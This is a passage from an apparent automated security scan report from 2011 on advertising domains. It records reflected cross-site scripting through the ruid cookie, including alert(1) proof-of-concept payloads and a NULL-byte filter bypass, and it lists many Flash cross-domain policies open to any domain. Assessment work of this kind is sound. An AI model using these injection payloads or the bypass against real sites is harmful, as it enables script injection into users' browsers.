Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=742b8"><script>alert(1)</script>a8c3bae217f; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; csi2=3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; put_2081=OO-00000000000000000; csi15=3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; ses15=12338^2&12590^2; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; rdk=7725/12338; rdk2=0; ses2=12338^3; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:15:06 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Wed, 07-Sep-2011 15:15:06 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Wed, 07-Sep-2011 15:15:06 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=12338^179&12590^56; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63893; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 2959

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...
<img src="http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=742b8"><script>alert(1)</script>a8c3bae217f" style="display: none;" border="0" height="1" width="1" alt=""/>
...[SNIP]...

2.90. http://optimized-by.rubiconproject.com/a/dk.js [ruid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/dk.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55008"-alert(1)-"715ba0f9f06 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/dk.js?defaulting_ad=i33333331362D317332.js&size_id=2&account_id=7856&site_id=12590&size=728x90&cb=0.42522372608073056 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.html?cb=0.5778487676288933&keyword=wa/news_home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=55008"-alert(1)-"715ba0f9f06; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; csi15=3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; ses15=12338^2&12590^2; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; rdk=7856/12590; rdk2=0; ses2=12338^3&12590^1; csi2=3196945.js^1^1315404874^1315404874&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:15:19 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Wed, 07-Sep-2011 15:15:19 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=46; expires=Wed, 07-Sep-2011 15:15:19 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=12338^179&12590^117; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63880; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 1595

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3155685"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=55008"-alert(1)-"715ba0f9f06\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

2.91. http://optimized-by.rubiconproject.com/a/dk.js [ruid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/dk.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %008ab72"-alert(1)-"f00a1aa43f9 was submitted in the ruid cookie. This input was echoed as 8ab72"-alert(1)-"f00a1aa43f9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /a/dk.js?defaulting_ad=i33333331362D317332.js&size_id=2&account_id=7856&site_id=12590&size=728x90&cb=0.7374124012421817 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.html?cb=0.8213596055284142&keyword=smh/news_other
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=%008ab72"-alert(1)-"f00a1aa43f9; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; cd=false; lm="7 Sep 2011 14:14:54 GMT"; csi15=3188306.js^1^1315404900^1315404900&3151650.js^1^1315404889^1315404889&3196947.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; rdk15=0; ses15=12338^5&12590^5; rdk=7856/12590; rdk2=0; ses2=12338^7&12590^4; csi2=3196945.js^2^1315404874^1315404931&3165011.js^2^1315404895^1315404918&3151648.js^1^1315404875^1315404875&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:19:56 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Wed, 07-Sep-2011 15:19:56 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=2; expires=Wed, 07-Sep-2011 15:19:56 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=ed39a%250d%250a9fcab745cce^&12590^4; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63603; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3165013.js^2^1315405196^1315405196&3165011.js^3^1315404895^1315405144&3151648.js^2^1315404875^1315404931&3196945.js^2^1315404874^1315404931&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; expires=Wed, 14-Sep-2011 14:19:56 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 1598

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3165013"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=%008ab72"-alert(1)-"f00a1aa43f9\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

3. Flash cross-domain policy  previous  next
There are 69 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


3.1. http://ad.agkn.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.agkn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.agkn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"219-1313398290000"
Last-Modified: Mon, 15 Aug 2011 08:51:30 GMT
Content-Type: application/xml
Content-Length: 219
Date: Wed, 07 Sep 2011 14:15:20 GMT
Connection: close

<?xml version="1.0"?>
    <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
    <cross-domain-policy>
    <allow-access-from domain="*" />
    </cr
...[SNIP]...

3.2. http://ad.turn.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: private
Pragma: private
Expires: Wed, 07 Sep 2011 14:14:22 GMT
Content-Type: text/xml;charset=UTF-8
Date: Wed, 07 Sep 2011 14:14:22 GMT
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

3.3. http://adfarm.mediaplex.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adfarm.mediaplex.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: adfarm.mediaplex.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"204-1158796163000"
Last-Modified: Wed, 20 Sep 2006 23:49:23 GMT
Content-Type: text/xml
Content-Length: 204
Date: Wed, 07 Sep 2011 14:14:35 GMT
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

3.4. http://adsfac.us/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adsfac.us
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: adsfac.us

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 30 Sep 2008 00:31:21 GMT
Accept-Ranges: bytes
ETag: "0291dc9322c91:0"
Server: Microsoft-IIS/7.0
P3P: CP="NOI DSP COR CUR PSA OUR BUS UNI NAV INT"
Date: Wed, 07 Sep 2011 14:21:02 GMT
Connection: close
Content-Length: 125

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" secure="true" />
</cross-domain-policy>


3.5. http://b.scorecardresearch.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Thu, 08 Sep 2011 14:14:17 GMT
Date: Wed, 07 Sep 2011 14:14:17 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

3.6. http://bh.contextweb.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bh.contextweb.com

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish v3
Accept-Ranges: bytes
ETag: W/"269-1314729061000"
Last-Modified: Tue, 30 Aug 2011 18:31:01 GMT
Content-Type: application/xml
Content-Length: 269
Date: Wed, 07 Sep 2011 14:16:01 GMT
Connection: Keep-Alive
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
               <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

3.7. http://bid.rb.ntc.ace.advertising.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bid.rb.ntc.ace.advertising.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bid.rb.ntc.ace.advertising.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 07 Sep 2011 14:14:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Wed, 07 Sep 2011 14:14:31 GMT
Content-Type: text/xml
Content-Length: 81

<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

3.8. http://bs.serving-sys.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bs.serving-sys.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=2592000
Content-Type: text/xml
Last-Modified: Thu, 21 Aug 2008 15:23:00 GMT
Accept-Ranges: bytes
ETag: "0e2c3cba13c91:0"
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Wed, 07 Sep 2011 14:14:23 GMT
Connection: close
Content-Length: 100

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>


3.9. http://cdn.turn.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.turn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.turn.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Pragma: private
Content-Type: text/xml;charset=UTF-8
Cache-Control: private, max-age=0
Expires: Wed, 07 Sep 2011 14:14:22 GMT
Date: Wed, 07 Sep 2011 14:14:22 GMT
Content-Length: 100
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

3.10. http://cdn4.eyewonder.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn4.eyewonder.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn4.eyewonder.com

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:17 GMT
Server: Apache
Last-Modified: Fri, 19 Dec 2008 21:38:40 GMT
ETag: "1607e7-c7-45e6d21e5d800"
Accept-Ranges: bytes
Content-Length: 199
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/x-cross-domain-policy

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

3.11. http://content.yieldmanager.edgesuite.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.yieldmanager.edgesuite.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: content.yieldmanager.edgesuite.net

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "428510723c54e1303cd7c65e002e5c20:1140130382"
Last-Modified: Thu, 16 Feb 2006 22:53:38 GMT
Accept-Ranges: bytes
Content-Length: 201
Content-Type: application/xml
Cache-Control: max-age=31536000
Date: Wed, 07 Sep 2011 14:20:04 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

3.12. http://d3.zedo.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d3.zedo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: d3.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Last-Modified: Mon, 18 May 2009 07:34:56 GMT
ETag: "3a9d108-f8-46a2ad4ab2800"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/xml
Content-Length: 248
Date: Wed, 07 Sep 2011 14:14:18 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.zedo.com -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

3.13. http://d7.zedo.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: d7.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Content-Length: 248
Content-Type: application/xml
ETag: "3a9d108-f8-46a2ad4ab2800"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=5429
Date: Wed, 07 Sep 2011 14:14:20 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.zedo.com -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

3.14. http://e.yimg.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://e.yimg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: e.yimg.com

Response

HTTP/1.0 200 OK
Date: Wed, 07 Sep 2011 00:48:28 GMT
Cache-Control: max-age=315360000
Expires: Sat, 04 Sep 2021 00:48:28 GMT
Last-Modified: Mon, 01 Feb 2010 17:51:54 GMT
Accept-Ranges: bytes
Content-Length: 408
Vary: Accept-Encoding
Content-Type: application/xml
Age: 48503
Server: YTS/1.19.5

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xs
...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...

3.15. http://edge.aperture.displaymarketplace.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://edge.aperture.displaymarketplace.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: edge.aperture.displaymarketplace.com

Response

HTTP/1.0 200 OK
Content-Length: 268
Content-Type: text/xml
Content-Location: http://edge.aperture.displaymarketplace.com/crossdomain.xml
Last-Modified: Wed, 06 Jan 2010 19:44:14 GMT
Accept-Ranges: bytes
ETag: "88db83a088fca1:1b06"
Server: Microsoft-IIS/6.0
X-Server: D2A.NJ-a.dm.com_x
P3P: CP="NON DEVo PSAo PSDo CONo OUR BUS UNI"
X-Powered-By: ASP.NET
Expires: Wed, 07 Sep 2011 14:15:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 07 Sep 2011 14:15:57 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
   <site-control perm
...[SNIP]...

3.16. http://espn-media.unitedfuture.com.s3.amazonaws.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://espn-media.unitedfuture.com.s3.amazonaws.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: espn-media.unitedfuture.com.s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://img-cdn.mediaplex.com/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
x-amz-id-2: zK7zaHiDXGCEZEqEThCTFm0axSqne8S7+V5NYbmJOvT8AeNTo4VGn1zUoEnH+jgL
x-amz-request-id: 85E0D11E6B66A525
Date: Wed, 07 Sep 2011 14:15:12 GMT
x-amz-meta-cb-modifiedtime: Tue, 03 Aug 2010 22:06:08 GMT
Last-Modified: Wed, 18 Aug 2010 21:56:31 GMT
ETag: "ae0d9ae5889a0eb857d5ac66b0a439ae"
Accept-Ranges: bytes
Content-Type: text/xml
Content-Length: 185
Server: AmazonS3

<?xml version="1.0" encoding="utf-8"?>
<cross-domain-policy>
   <allow-access-from domain="*" />
   <site-control permitted-cross-domain-policies="master-only" />
</cross-domain-policy>

3.17. http://external.ak.fbcdn.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://external.ak.fbcdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

